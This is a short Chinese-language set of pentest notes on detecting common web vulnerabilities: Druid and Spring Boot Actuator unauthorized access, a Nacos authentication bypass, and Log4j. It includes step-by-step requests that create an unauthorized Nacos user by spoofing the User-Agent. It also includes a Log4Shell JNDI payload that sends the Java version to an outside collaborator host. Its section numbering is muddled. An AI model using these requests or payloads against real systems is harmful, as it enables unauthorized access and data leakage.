部分漏洞检测方式

1、druid未授权访问

https://XXX.XXX.XXX/druid/index.html

1、简介

Actuator是Spring Boot提供的服务监控和管理中间件，默认配置会出现接口未授权访问，部分接口会泄露网站流量信息和内存信息等，使用Jolokia库特性甚至可以远程执行任意代码，获取服务器权限。

2、Spring Boot Actuator未授权访问

访问以下路径，如果有返回值代表存在该漏洞

https://XXX.XXX.XXX/actuator/env

http://XXX.XXX.XXX/actuator/mappings

/dump- 显示线程转储（包括堆栈跟踪）

/autoconfig- 显示自动配置报告

/configprops- 显示配置属性

/trace- 显示最后几条HTTP消息（可能包含会话标识符）

/logfile- 输出日志文件的内容

/shutdown- 关闭应用程序

/info- 显示应用信息

/metrics- 显示当前应用的’指标’信息

/health- 显示应用程序的健康指标

/beans- 显示Spring Beans的完整列表

/mappings- 显示所有MVC控制器映射

/env- 提供对配置环境的访问

/restart- 重新启动应用程序

3、nacos漏洞

简介：Dynamic Naming and Configuration Service及注册配置中心，提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

默认账号密码：nacos/nacos

漏洞复现：

1、http://xx.xx.xx.xx:8848/nacos/#/login访问nacos登录

2、http://xx.xx.xx.xx:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9访问用户列表接口

3、新建账号密码

1》访问nacos/v1截取数据包

2〉地址改成nacos/v1/auth/users?username=nacos&password=nacos

3》get改成POST

4〉User-Agent值修改为Nacos-Server

5》提交数据包查看返回信息查看是否新建用户成功，成功后使用新建的账号密码登录即可

修复方案：升级版本

4、简介

1）ApacheLog4j 2是对Log4j的升级，它比其前身Log4j 1.x提供了重大改进，并提供了Logback中可用的许多改进，同时修复了Logback架构中的一些问题。是目前最优秀的Java日志框架之一。

2）漏洞验证

把服务器修改成你的服务器地址，即可得到响应的响应

${jndi:ldap://${sys:java.version}.collaborator.com}